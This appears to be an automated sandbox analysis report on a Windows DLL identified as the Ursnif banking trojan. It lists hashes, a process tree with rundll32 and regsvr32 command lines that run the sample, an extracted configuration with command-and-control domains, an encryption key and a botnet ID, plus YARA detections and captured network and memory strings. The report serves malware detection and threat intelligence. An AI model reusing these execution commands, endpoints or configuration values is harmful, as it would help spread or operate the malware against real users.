Play interactive tour

Edit tour

Windows Analysis Report 2W6FcgEeMy.dll

Overview

General Information

Sample Name:	2W6FcgEeMy.dll
Analysis ID:	526322
MD5:	7dc420886e9c1a1e40e34d73ed2faf7c
SHA1:	1cf57d47fab52815150a8236e985e7976aba4f75
SHA256:	4e7f81fa970f3c2ffa70c22d10b2c81efbf7429594719be49b56a0b516503e4b
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

System process connects to network (likely due to code injection or exploit)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Tries to load missing DLLs

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Registers a DLL

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6196 cmdline: loaddll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 984 cmdline: rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6292 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2W6FcgEeMy.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 6068 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6528 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6068 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 6432 cmdline: rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3112 cmdline: rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,adqehmqaggtoqofda MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2944 cmdline: rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,awkikcxxkllcr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6196	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 6292	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 984	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.10f0000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.49194a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4fb94a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4fb94a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.710000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.49194a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.2fa0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.19794a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.19794a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.2f90000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6f0000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.2fd0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.1340000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6e0000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6f0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.2fa0000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.1100000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.1100000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.loaddll32.exe.10f0000.0.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: 3.2.rundll32.exe.6f0000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.1100000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2W6FcgEeMy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.215.230:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49830 version: TLS 1.2

Source: 2W6FcgEeMy.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA23D0 FindNextFileA,FindClose,FindFirstFileA,FindFirstFileA,FindNextFileA,SetFilePointer,CreateFileA,CloseHandle,ReadFile,CreateFileA,CreateFileA,SetFilePointer,GetLastError,SetFilePointer,GetLastError,ReadFile,ReadFile,CloseHandle,CreateFileA,FindNextFileA,	0_2_6EDA23D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA6F26 FindFirstFileExW,	0_2_6EDA6F26
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA23D0 FindNextFileA,FindClose,FindFirstFileA,FindFirstFileA,FindNextFileA,SetFilePointer,CreateFileA,CloseHandle,ReadFile,CreateFileA,CreateFileA,SetFilePointer,GetLastError,SetFilePointer,GetLastError,ReadFile,ReadFile,FindCloseChangeNotification,CreateFileA,FindNextFileA,	2_2_6EDA23D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA6F26 FindFirstFileExW,	2_2_6EDA6F26

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Domain query: technoshoper.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926

Source: de-ch[1].htm.7.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xdde73afe,0x01d7dfa4</date><accdate>0xde063966,0x01d7dfa4</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe095df9b,0x01d7dfa4</date><accdate>0xe0f078c7,0x01d7dfa4</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe1af355a,0x01d7dfa4</date><accdate>0xe221a595,0x01d7dfa4</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.7.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.7.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: http://avolebukoneh.website
Source: rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: http://avolebukoneh.website/glik/.lwe.bmp08899
Source: loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp	String found in binary or memory: http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA
Source: loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp	String found in binary or memory: http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYA%-
Source: loaddll32.exe, 00000000.00000002.1205938172.00000000013FE000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.1191440529.0000000000975000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: de-ch[1].htm.7.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.7.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: loaddll32.exe, 00000000.00000002.1206124177.0000000001423000.00000004.00000020.sdmp	String found in binary or memory: http://schema.org/Organization
Source: {EBFDF004-4B97-11EC-90EB-ECF4BBEA1588}.dat.5.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: imagestore.dat.7.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: http://technoshoper.com
Source: msapplication.xml.5.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.5.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.7.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml2.5.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.5.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.5.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.5.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.5.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.5.dr	String found in binary or memory: http://www.youtube.com/
Source: loaddll32.exe, 00000000.00000003.1189532035.0000000001421000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: loaddll32.exe, 00000000.00000003.1189379909.0000000001435000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1191310809.00000000009E6000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36
Source: loaddll32.exe, 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp	String found in binary or memory: https://avolebukoneh.website
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.7.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: de-ch[1].htm.7.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
